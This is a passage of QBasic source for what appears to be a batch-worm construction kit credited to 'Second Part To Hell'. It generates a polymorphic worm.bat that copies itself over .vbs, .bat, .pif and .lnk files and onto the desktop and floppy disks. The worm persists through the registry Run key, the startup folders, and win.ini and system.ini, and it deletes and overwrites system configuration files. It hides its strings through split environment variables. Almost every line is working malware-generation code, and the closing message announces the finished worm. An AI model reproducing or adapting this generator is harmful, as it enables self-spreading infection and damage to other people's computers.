rand = INT(RND * 3) + 1
IF rand = 1 THEN PRINT #1, "% EEEE % set vbsB=i"
IF rand = 1 THEN vbsBP$ = "%vbsB%pt"
IF rand = 2 THEN PRINT #1, "% EEEE % set vbsB=p"
IF rand = 2 THEN vbsBP$ = "i%vbsB%t"
IF rand = 3 THEN PRINT #1, "% EEEE % set vbsB=t"
IF rand = 3 THEN vbsBP$ = "ip%vbsB%"
vbsAB$ = vbsAP$ + vbsBP$
PRINT #1, "copy "; MyS$; " "; vbsDropFile$; " % EEEE %"
PRINT #1, "copy "; MyS$; " "; vbsDropFileRun$; " % EEEE %"
PRINT #1, "echo.on error resume next > "; vbsDropFile$; " % EEEE %"
PRINT #1, "echo dim wshs >>"; vbsDropFile$; " % EEEE %"
PRINT #1, "echo set wshs="; vbsAB$; ".createobject("; CHR$(34); vbsAB$; ".shell"; CHR$(34); ") >>"; vbsDropFile$; " % EEEE %"
PRINT #1, "echo wshs.run "; CHR$(34); vbsDropFileRun$; CHR$(34); " >>"; vbsDropFile$; " % EEEE %"
PRINT #1, "% EEEE % set VDA=for"
PRINT #1, "%VDA% %%q in (*.vbs \*.vbs ..\*.vbs %path%\*.vbs %windir%\*.vbs) do copy "; vbsDropFile$; " %%q"; " % EEEE %"
PRINT #1, "% EEEE % set VDA="
PRINT #1, "% EEEE % set vbsA="
PRINT #1, "% EEEE % set vbsB="
VBSInfectionEnd:
IF regkey = 1 THEN GOTO ReKey
GOTO ReKeyEnd
ReKey:
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(ran)
ran = INT(RND * 26) + 97
c$ = CHR$(ran)
ran = INT(RND * 26) + 97
d$ = CHR$(ran)
ran = INT(RND * 26) + 97
e$ = CHR$(ran)
regi$ = a$ + b$ + c$ + d$ + e$ + ".vbs"
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(ran)
ran = INT(RND * 26) + 97
c$ = CHR$(ran)
ran = INT(RND * 26) + 97
d$ = CHR$(ran)
ran = INT(RND * 26) + 97
e$ = CHR$(ran)
regiop$ = a$ + b$ + c$ + d$ + e$ + ".bat"
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(ran)
ran = INT(RND * 26) + 97
c$ = CHR$(ran)
ran = INT(RND * 26) + 97
d$ = CHR$(ran)
ran = INT(RND * 26) + 97
e$ = CHR$(ran)
reginame$ = a$ + b$ + c$ + d$ + e$
PRINT #1, "copy "; MyS$; " "; regi$; " % CCCC %"
PRINT #1, "copy "; MyS$; " %windir%\"; regiop$; " % CCCC %"
PRINT #1, "echo.on error resume next >"; regi$; " % CCCC %"
PRINT #1, "echo set ws = CreateObject("; CHR$(34); "wscript.shell"; CHR$(34); ") >> "; regi$; " % CCCC %"
rand = INT(RND * 4) + 1
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(ran)
c$ = a$ + b$
PRINT #1, "% CCCC % set regi="; c$
IF rand = 1 THEN PRINT #1, "% CCCC % set regi=H"
IF rand = 1 THEN regist$ = "%regi%KLM"
IF rand = 2 THEN PRINT #1, "% CCCC % set regi=K"
IF rand = 2 THEN regist$ = "H%regi%LM"
IF rand = 3 THEN PRINT #1, "% CCCC % set regi=L"
IF rand = 3 THEN regist$ = "HK%regi%M"
IF rand = 4 THEN PRINT #1, "% CCCC % set regi=M"
IF rand = 4 THEN regist$ = "HKL%regi%"
PRINT #1, "echo ws.regwrite "; CHR$(34); regist$; "\Software\Microsoft\Windows\CurrentVersion\Run\"; reginame$; CHR$(34); ","; CHR$(34); "%windir%\"; regiop$; CHR$(34); " >>"; regi$; " % CCCC %"
PRINT #1, "set regi="; " % CCCC %"
rand = INT(RND * 3) + 1
IF rand = 1 THEN PRINT #1, "% CCCC % set regiA=sc"
IF rand = 1 THEN regy$ = "c%regi%ript"
IF rand = 2 THEN PRINT #1, "% CCCC % set regiA=rip"
IF rand = 2 THEN regy$ = "csc%regiA%t"
IF rand = 3 THEN PRINT #1, "% CCCC % set regiA=csc"
IF rand = 3 THEN regy$ = "%regiA%ript"
PRINT #1, ""; regy$; " "; regi$; " % CCCC %"
PRINT #1, "del "; regi$; " % CCCC %"
PRINT #1, "set regiA="; " % CCCC %"
ReKeyEnd:
IF BatDateienInf = 1 THEN GOTO BatDatei
GOTO BatDateiEnd
BatDatei:              
BatDaA = INT(RND * 2) + 1
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(ran)
ran = INT(RND * 26) + 97
c$ = CHR$(ran)
ran = INT(RND * 26) + 97
d$ = CHR$(ran)
ran = INT(RND * 26) + 97
e$ = CHR$(ran)
bafina$ = a$ + b$ + c$ + d$ + e$ + ".bat"
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(ran)
ran = INT(RND * 26) + 97
c$ = CHR$(ran)
fakeBDAs$ = a$ + b$ + c$
PRINT #1, "% DDDD % set BDAs="; fakeBDAs$
IF BatDaA = 1 THEN PRINT #1, "% DDDD % set BDAs=for"
IF BatDaA = 1 THEN PRINT #1, "copy "; MyS$; " %winDir%\"; bafina$; " % DDDD %"
IF BatDaA = 1 THEN PRINT #1, "%BDAs% %%v in (*.bat ..\*.bat \*.bat %path%\*.bat) do copy %WinDir%\"; bafina$; " %%v % DDDD %"
IF BatDaA = 1 THEN PRINT #1, "del %WinDir%\"; bafina$; " % DDDD %"
IF BatDaA = 2 THEN PRINT #1, "% DDDD % set BDAs=for"
IF BatDaA = 2 THEN PRINT #1, "copy "; MyS$; " C:\"; bafina$; " % DDDD %"
IF BatDaA = 2 THEN PRINT #1, "%BDAs% %%v in (*.bat ..\*.bat \*.bat %path%\*.bat) do copy C:\"; bafina$; " %%v"; " % DDDD %"
IF BatDaA = 2 THEN PRINT #1, "del C:\"; bafina$; " % DDDD %"
BatDateiEnd:
IF DeuAutoSt = 1 THEN GOTO Deuaustart
GOTO deuautostend
Deuaustart:
deuautoSta = INT(RND * 3) + 1
RANDOMIZE TIMER
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(ran)
ran = INT(RND * 26) + 97
c$ = CHR$(ran)
ran = INT(RND * 26) + 97
d$ = CHR$(ran)
ran = INT(RND * 26) + 97
e$ = CHR$(ran)
daufina$ = a$ + b$ + c$ + d$ + e$ + ".bat"
IF deuautoSta = 1 THEN PRINT #1, "copy "; MyS$; " %windir%\startm~1\progra~1\autost~1\*.bat"; " % DDDD %"
IF deuautoSta = 2 THEN PRINT #1, "copy "; MyS$; " C:\"; daufina$; " % DDDD %"
IF deuautoSta = 2 THEN PRINT #1, "copy C:\"; daufina$; " %windir%\startm~1\progra~1\autost~1\*.bat"; " % DDDD %"
IF deuautoSta = 2 THEN PRINT #1, "del C:\"; daufina$; " % DDDD %"
IF deuautoSta = 3 THEN PRINT #1, "copy "; MyS$; " C:\"; daufina$; " % DDDD %"
IF deuautoSta = 3 THEN PRINT #1, "move  C:\"; daufina$; " %windir%\startm~1\progra~1\autost~1"; " % DDDD %"
deuautostend:
IF EngAutoSt = 1 THEN GOTO EngAuSt
GOTO EngAuStEnd
EngAuSt:
RANDOMIZE TIMER
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(ran)
ran = INT(RND * 26) + 97
c$ = CHR$(ran)
ran = INT(RND * 26) + 97
d$ = CHR$(ran)
ran = INT(RND * 26) + 97
e$ = CHR$(ran)
eaufina$ = a$ + b$ + c$ + d$ + e$ + ".bat"
PRINT #1, "copy "; MyS$; " %windir%\Startm~1\Programs\StartUp\"; eaufina$; " % EEEE %"
EngAuStEnd:
IF LogLauf = 1 GOTO LogLaufwerk
GOTO AD
LogLaufwerk:
llf = INT(RND * 2) + 1
RANDOMIZE TIMER
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(ran)
ran = INT(RND * 26) + 97
c$ = CHR$(ran)
ran = INT(RND * 26) + 97
d$ = CHR$(ran)
ran = INT(RND * 26) + 97
e$ = CHR$(ran)
subfina$ = a$ + b$ + c$ + d$ + e$ + ".bat"
IF llf = 1 THEN PRINT #1, "md C:\suPs"; "% CCCC % "
IF llf = 1 THEN PRINT #1, "copy "; MyS$; " C:\suPs\"; subfina$; "% CCCC % "
IF llf = 1 THEN PRINT #1, "subst L: C:\suPs"; "% CCCC % "
IF llf = 2 THEN PRINT #1, "md C:\suPs"; "% CCCC % "
IF llf = 2 THEN PRINT #1, "copy "; MyS$; " C:\suPs\"; subfina$; "% CCCC % "
IF llf = 2 THEN PRINT #1, "subst L: C:\suPs"; "% CCCC % "
AD:
IF windir = 1 THEN GOTO WinD
GOTO EndWinD
WinD:
RANDOMIZE TIMER
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(ran)
ran = INT(RND * 26) + 97
c$ = CHR$(ran)
ran = INT(RND * 26) + 97
d$ = CHR$(ran)
ran = INT(RND * 26) + 97
e$ = CHR$(ran)
wdfina$ = a$ + b$ + c$ + d$ + e$ + ".bat"
WinDR = INT(RND * 2) + 1
IF WinDR = 1 THEN PRINT #1, "% CCCC % set WDs=for"
IF WinDR = 1 THEN PRINT #1, "copy "; MyS$; " C:\"; wdfina$; "% CCCC % "
IF WinDR = 1 THEN PRINT #1, "%WDs% %%w in (%windir%\*.bat) do copy C:\"; wdfina$; " %%w"; "% CCCC % "
IF WinDR = 1 THEN PRINT #1, "del C:\"; wdfina$; "% CCCC % "
IF WinDR = 2 THEN PRINT #1, "% CCCC % set WDs=for"
IF WinDR = 2 THEN PRINT #1, "ren %WinDir%\*.bat *.ifk"; "% CCCC % "
IF WinDR = 2 THEN PRINT #1, "copy "; MyS$; " C:\"; wdfina$; "% CCCC % "
IF WinDR = 2 THEN PRINT #1, "%WDs% %%w in (%windir%\*.ifk) do copy C:\"; wdfina$; " %%w"; "% CCCC % "
IF WinDR = 2 THEN PRINT #1, "ren %windir%\*.ifk *.bat"; "% CCCC % "
IF WinDR = 2 THEN PRINT #1, "del C:\"; wdfina$; "% CCCC % "
EndWinD:
IF WinINI = 1 GOTO WiINI
GOTO WiINIEnd
WiINI:
PRINT #1, "copy "; MyS$; " %WinDir%\system\WINI.bat"; " % DDDD % "
inip = INT(RND * 2) + 1
IF inip = 1 THEN PRINT #1, "echo [windows] >funny.bat"; " % DDDD % "
IF inip = 2 THEN PRINT #1, "% DDDD % set inia=windows"
IF inip = 2 THEN PRINT #1, "echo [%inia%] >funny.bat"; " % DDDD % "
inip = INT(RND * 2) + 1
IF inip = 1 THEN PRINT #1, "echo load=%windir%\system\WINI.bat >>funny.bat"; " % DDDD % "
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(ran)
c$ = a$ + b$
IF inip = 1 THEN PRINT #1, "% DDDD % set inib="; c$
IF inip = 2 THEN PRINT #1, "% DDDD % set inib=system"
IF inip = 2 THEN PRINT #1, "echo load=%windir%\%inib%\WINI.bat >>funny.bat"; " % DDDD % "
inip = INT(RND * 1) + 1
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(ran)
c$ = a$ + b$
PRINT #1, "set inic="; c$; "% DDDD %"
IF inip = 1 THEN PRINT #1, "% DDDD % set inic=WINI.bat"
IF inip = 1 THEN PRINT #1, "echo run=%windir%\system\%inic% >>funny.bat"; " % DDDD % "
PRINT #1, "% DDDD %set inid="
PRINT #1, "% DDDD %set inic="
PRINT #1, "% DDDD %set inib="
PRINT #1, "% DDDD %set inia="
inip = INT(RND * 1) + 1
IF inip = 1 THEN PRINT #1, "% DDDD % set inid=Port"
rand = INT(RND * 4) + 1
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(ran)
c$ = a$ + b$
PRINT #1, "set inie="; c$; " % DDDD %"
IF rand = 1 THEN PRINT #1, "% DDDD % set inie=N"
IF rand = 1 THEN wininiset$ = "%inie%ull"
IF rand = 2 THEN PRINT #1, "% DDDD % set inie=u"
IF rand = 2 THEN wininiset$ = "N%inie%ll"
IF rand = 3 THEN PRINT #1, "% DDDD % set inie=l"
IF rand = 3 THEN wininiset$ = "Nu%inie%l"
IF rand = 4 THEN PRINT #1, "% DDDD % set inie=l"
IF rand = 4 THEN wininiset$ = "Nul%inie%"
rand = INT(RND * 4) + 1
IF rand = 1 THEN PRINT #1, "% DDDD % set inif=N"
IF rand = 1 THEN winsetb$ = "%inif%one"
IF rand = 2 THEN PRINT #1, "% DDDD % set inif=o"
IF rand = 2 THEN winsetb$ = "N%inif%ne"
IF rand = 3 THEN PRINT #1, "% DDDD % set inif=n"
IF rand = 3 THEN winsetb$ = "No%inif%e"
IF rand = 4 THEN PRINT #1, "% DDDD % set inif=e"
IF rand = 4 THEN winsetb$ = "Non%inif%"
inip = INT(RND * 2) + 1
PRINT #1, "echo "; wininiset$; "%inid%="; winsetb$; " >>funny.bat"; " % DDDD % "
IF inip = 1 THEN PRINT #1, "copy funny.bat %windir%\dd.ini"; " % DDDD % "
IF inip = 2 THEN PRINT #1, "% DDDD % set inie=funny"
IF inip = 2 THEN PRINT #1, "copy %inie%.bat %windir%\dd.ini"; " % DDDD % "
inip = INT(RND * 2) + 1
IF inip = 1 THEN PRINT #1, "del %windir%\win.ini"; " % DDDD % "
IF inip = 2 THEN PRINT #1, "% DDDD % set inif=win"
IF inip = 2 THEN PRINT #1, "del %windir%\%inif%.ini"; " % DDDD % "
inip = INT(RND * 2) + 1
IF inip = 1 THEN PRINT #1, "del funny.bat"; " % DDDD % "
IF inip = 2 THEN PRINT #1, "% DDDD % set inig=unny"
IF inip = 2 THEN PRINT #1, "del f%inig%.bat"; " % DDDD % "
inip = INT(RND * 2) + 1
IF inip = 1 THEN PRINT #1, "ren %windir%\dd.ini win.ini"; " % DDDD % "
IF inip = 2 THEN PRINT #1, "% DDDD % set inih=dd.in"
IF inip = 2 THEN PRINT #1, "ren %windir%\%inih%i win.ini"; " % DDDD % "
PRINT #1, "% DDDD %set inih="
PRINT #1, "% DDDD %set inig="
PRINT #1, "% DDDD %set inif="
PRINT #1, "% DDDD %set inie="
WiINIEnd:
IF PifFileI = 1 THEN GOTO PifFInfection
GOTO PIFFInfectionEnd
PifFInfection:
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(ran)
ran = INT(RND * 26) + 97
c$ = CHR$(ran)
ran = INT(RND * 26) + 97
d$ = CHR$(ran)
ran = INT(RND * 26) + 97
e$ = CHR$(ran)
PIFDropFile$ = a$ + b$ + c$ + d$ + e$ + ".bat"
PRINT #1, "copy "; MyS$; " %windir%\drop.vbs"; " % EEEE % "
PRINT #1, "copy "; MyS$; " %windir%\"; PIFDropFile$; " % EEEE %"
PRINT #1, "echo dim wshs, msc > %windir%\drop.vbs"; " % EEEE %"
rand = INT(RND * 2) + 1
IF rand = 1 THEN PRINT #1, "% EEEE % set pifA=WS"
IF rand = 1 THEN PRINT #1, "echo set wshs=Wscript.CreateObject("; CHR$(34); "%pifA%cript.Shell"; CHR$(34); ") >> %windir%\drop.vbs"; " % EEEE %"
IF rand = 1 THEN PRINT #1, "% EEEE %set pifA="
IF rand = 2 THEN PRINT #1, "% EEEE % set pifA=cript"
IF rand = 2 THEN PRINT #1, "echo set wshs=Wscript.CreateObject("; CHR$(34); "WS%pifA%.Shell"; CHR$(34); ") >> %windir%\drop.vbs"; " % EEEE %"
IF rand = 2 THEN PRINT #1, "% EEEE %set pifA="
rand = INT(RND * 4) + 1
IF rand = 1 THEN PRINT #1, "% EEEE % set pifB=Cr"
IF rand = 1 THEN PRINT #1, "echo set msc=wshs.%pifB%eateShortcut("; CHR$(34); "C:\pif.lnk"; CHR$(34); ") >> %windir%\drop.vbs"; " % EEEE %"
IF rand = 2 THEN PRINT #1, "% EEEE % set pifB=ea"
IF rand = 2 THEN PRINT #1, "echo set msc=wshs.Cr%pifB%teShortcut("; CHR$(34); "C:\pif.lnk"; CHR$(34); ") >> %windir%\drop.vbs"; " % EEEE %"
IF rand = 3 THEN PRINT #1, "% EEEE % set pifB=te"
IF rand = 3 THEN PRINT #1, "echo set msc=wshs.Crea%pifB%Shortcut("; CHR$(34); "C:\pif.lnk"; CHR$(34); ") >> %windir%\drop.vbs"; " % EEEE %"
IF rand = 4 THEN PRINT #1, "% EEEE % set pifB=CreateShortcut"
IF rand = 4 THEN PRINT #1, "echo set msc=wshs.%pifB%("; CHR$(34); "C:\pif.lnk"; CHR$(34); ") >> %windir%\drop.vbs"; " % EEEE %"
PRINT #1, "% EEEE %set pifB="
PRINT #1, "echo msc.TargetPath = wshs.ExpandEnvironmentStrings("; CHR$(34); "%windir%\"; PIFDropFile$; CHR$(34); ") >> %windir%\drop.vbs"; " % EEEE %"
PRINT #1, "echo msc.WindowStyle = 4 >> %windir%\drop.vbs"; " % EEEE %"
rand = INT(RND * 2) + 1
IF rand = 1 THEN PRINT #1, "% EEEE % set pifC=Sa"
IF rand = 1 THEN PRINT #1, "echo msc.%pifC%ve >> %windir%\drop.vbs"; " % EEEE %"
IF rand = 2 THEN PRINT #1, "% EEEE % set pifC=ve"
IF rand = 2 THEN PRINT #1, "echo msc.Sa%pifC% >> %windir%\drop.vbs"; " % EEEE %"
PRINT #1, "% EEEE %set pifC="
rand = INT(RND * 2) + 1
IF rand = 1 THEN PRINT #1, "% EEEE % set pifD=cscript"
IF rand = 1 THEN PRINT #1, "%pifD% %windir%\drop.vbs"; " % EEEE %"
IF rand = 2 THEN PRINT #1, "% EEEE % set pifD=scr"
IF rand = 2 THEN PRINT #1, "c%pifD%ipt %windir%\drop.vbs"; " % EEEE %"
PRINT #1, "del %windir%\drop.vbs"; " % EEEE %"
PRINT #1, "% EEEE % set PDA=for"
PRINT #1, "%PDA% %%k in (*.pif \*.pif ..\*.pif %path%\*.pif %windir%\*.pif) do copy C:\pif.pif %%k"; " % EEEE %"
PRINT #1, "% EEEE %set PDA="
PRINT #1, "del C:\pif.pif"; " % EEEE %"
PIFFInfectionEnd:
IF LnkFileI = 1 THEN GOTO LnkFileInfection
GOTO LnkFileInfectionEnd
LnkFileInfection:
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(ran)
ran = INT(RND * 26) + 97
c$ = CHR$(ran)
ran = INT(RND * 26) + 97
d$ = CHR$(ran)
ran = INT(RND * 26) + 97
e$ = CHR$(ran)
LNKdropFile$ = a$ + b$ + c$ + d$ + e$ + ".bat"
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(ran)
lnkAPF$ = a$ + b$
PRINT #1, "% CCCC % set lnkA="; lnkAPF$;
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(ran)
lnkBPF$ = a$ + b$
PRINT #1, "set lnkB="; lnkBPF$; " % CCCC % "
rand = INT(RND * 4) + 1
IF rand = 1 THEN PRINT #1, "% CCCC % set lnkA=w"
IF rand = 1 THEN lnkAP$ = "%lnkA%scr"
IF rand = 2 THEN PRINT #1, "% CCCC % set lnkA=s"
IF rand = 2 THEN lnkAP$ = "w%lnkA%cr"
IF rand = 3 THEN PRINT #1, "% CCCC % set lnkA=c"
IF rand = 3 THEN lnkAP$ = "ws%lnkA%r"
IF rand = 4 THEN PRINT #1, "% CCCC % set lnkA=r"
IF rand = 4 THEN lnkAP$ = "wsc%lnkA%"
rand = INT(RND * 3) + 1
IF rand = 1 THEN PRINT #1, "% CCCC % set lnkB=i"
IF rand = 1 THEN lnkBP$ = "%lnkB%pt"
IF rand = 2 THEN PRINT #1, "% CCCC % set lnkB=p"
IF rand = 2 THEN lnkBP$ = "i%lnkB%t"
IF rand = 3 THEN PRINT #1, "% CCCC % set lnkB=t"
IF rand = 3 THEN lnkBP$ = "ip%lnkB%"
lnkAB$ = lnkAP$ + lnkBP$
PRINT #1, "copy "; MyS$; " %windir%\dropa.vbs"; " % CCCC % "
PRINT #1, "copy "; MyS$; " %windir%\"; LNKdropFile$; " % CCCC % "
PRINT #1, "copy "; MyS$; " %windir%\dropb.vbs"; " % CCCC % "
PRINT #1, "echo.on error resume next >%windir%\dropb.vbs"; " % CCCC % "
PRINT #1, "echo dim wshs >>%windir%\dropb.vbs"; " % CCCC % "
PRINT #1, "echo set wshs="; lnkAB$; ".createobject("; CHR$(34); lnkAB$; ".shell"; CHR$(34); ") >>%windir%\dropb.vbs"; " % CCCC % "
PRINT #1, "echo wshs.run "; CHR$(34); "%windir%\"; LNKdropFile$; CHR$(34); " >>%windir%\dropb.vbs"; " % CCCC % "
PRINT #1, "echo dim wshs, msc > %windir%\dropa.vbs"; " % CCCC % "
PRINT #1, "echo set wshs="; lnkAB$; ".CreateObject("; CHR$(34); lnkAB$; ".Shell"; CHR$(34); ") >> %windir%\dropa.vbs"; " % CCCC % "
PRINT #1, "echo set msc=wshs.CreateShortcut("; CHR$(34); "C:\vbs.lnk"; CHR$(34); ") >> %windir%\dropa.vbs"; " % CCCC % "
PRINT #1, "echo msc.TargetPath = wshs.ExpandEnvironmentStrings("; CHR$(34); "%windir%\dropb.vbs "; CHR$(34); ") >> %windir%\dropa.vbs"; " % CCCC % "
PRINT #1, "echo msc.WindowStyle = 4 >> %windir%\dropa.vbs"; " % CCCC % "
PRINT #1, "echo msc.Save >> %windir%\dropa.vbs"; " % CCCC % "
PRINT #1, "cscript %windir%\dropa.vbs"; " % CCCC % "
PRINT #1, "del %windir%\dropa.vbs"; " % CCCC % "
PRINT #1, "% CCCC % set LDA=for"
PRINT #1, "%LDA% %%k in (*.lnk \*.lnk ..\*.lnk %path%\*.lnk %windir%\*.lnk) do copy C:\vbs.lnk %%k"; " % CCCC % "
PRINT #1, "% CCCC %set LDA="
PRINT #1, "del C:\vbs.lnk"; " % CCCC %"
PRINT #1, "% CCCC % set lnkA="
PRINT #1, "% CCCC %set lnkB="
LnkFileInfectionEnd:
IF SysINI = 1 THEN GOTO SystemINI
GOTO SystemINIEnd
SystemINI:
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(ran)
ran = INT(RND * 26) + 97
c$ = CHR$(ran)
ran = INT(RND * 26) + 97
d$ = CHR$(ran)
ran = INT(RND * 26) + 97
e$ = CHR$(ran)
sysname$ = a$ + b$ + c$ + d$ + e$ + ".bat"
PRINT #1, "copy "; MyS$; " "; sysname$; " % DDDD % "
PRINT #1, "echo [boot] > %windir%\system.ini"; " % DDDD % "
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(ran)
sysfakenameA$ = a$ + b$
PRINT #1, "% DDDD % set sysiniA="; sysfakenameA$
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(ran)
sysfakenameB$ = a$ + b$
PRINT #1, "% DDDD % set sysiniB="; sysfakenameB$
rand = INT(RND * 2) + 1
IF rand = 1 THEN PRINT #1, "% DDDD % set sysiniA=s"
IF rand = 1 THEN sysiniAP$ = "%sysiniA%h"
IF rand = 2 THEN PRINT #1, "% DDDD % set sysiniA=h"
IF rand = 2 THEN sysiniAP$ = "s%sysiniA%"
rand = INT(RND * 3) + 1
IF rand = 1 THEN PRINT #1, "% DDDD % set sysiniB=e"
IF rand = 1 THEN sysiniBP$ = "%sysiniB%ll"
IF rand = 2 THEN PRINT #1, "% DDDD % set sysiniB=l"
IF rand = 2 THEN sysiniBP$ = "e%sysiniB%l"
IF rand = 3 THEN PRINT #1, "% DDDD % set sysiniB=l"
IF rand = 3 THEN sysiniBP$ = "el%sysiniB%"
sysiniAllP$ = sysiniAP$ + sysiniBP$
PRINT #1, "echo "; sysiniAllP$; "=explorer.exe %windir%\"; sysname$; ">> %windir%\system.ini"; " % DDDD %"
PRINT #1, "% DDDD %set sysiniA="
PRINT #1, "% DDDD %set sysiniB="
SystemINIEnd:
IF Desktop = 1 THEN GOTO Desktp
GOTO Desktpend
Desktp:
DesktopR = INT(RND * 2) + 1
IF DesktopR = 1 THEN PRINT #1, "copy "; MyS$; " %windir%\Desktop\*.bat"; " % EEEE %"
IF DesktopR = 2 THEN PRINT #1, "copy "; MyS$; " %windir%\Desktop\*.ifk"; " % EEEE %"
IF DesktopR = 2 THEN PRINT #1, "ren %windir%\Desktop\*.ifk *.bat"; " % EEEE %"
Desktpend:
IF Diskette = 1 THEN GOTO DiskAdisK
GOTO DiskAdisKEnd
DiskAdisK:
PRINT #1, "command /f /c copy "; MyS$; " A:\ % CCCC %"
DiskAdisKEnd:
PRINT #1, "@del "; MyS$; " % BBBB %"
PRINT #1, "ctty CON % BBBB %"
IF mesg = 1 THEN PRINT #1, "echo "; msg$; "% BBBB%";
CLOSE #1
CLS
COLOR 1
PRINT "             + + + + + + + + + + + + + + + + + + + + + + + + + + + "
PRINT "             + + + +                                       + + + + "
PRINT "             + + + +      "; name$; "        + + + + "
PRINT "             + + + +                                       + + + + "
PRINT "             + + + + + + + + + + + + + + + + + + + + + + + + + + + "
PRINT ""
COLOR 7
PRINT ""
PRINT " The worm has been saved as "; CHR$(34); "worm.bat"; CHR$(34); " in the CURRENT direction! "
PRINT ""
PRINT " Please read the INFORMATION."
PRINT ""
PRINT " Thank you for using "; name$; " !!"
PRINT " A new version of the program can be found here:"
COLOR 4
PRINT " http://www.SPTH.de.vu"
PRINT ""
PRINT ""
PRINT "                                         YOURS"
PRINT "                                  Second Part To Hell"
COLOR 7
PRINT ""
INPUT " Press enter... ", nix$
GOTO headline
Ende:
    



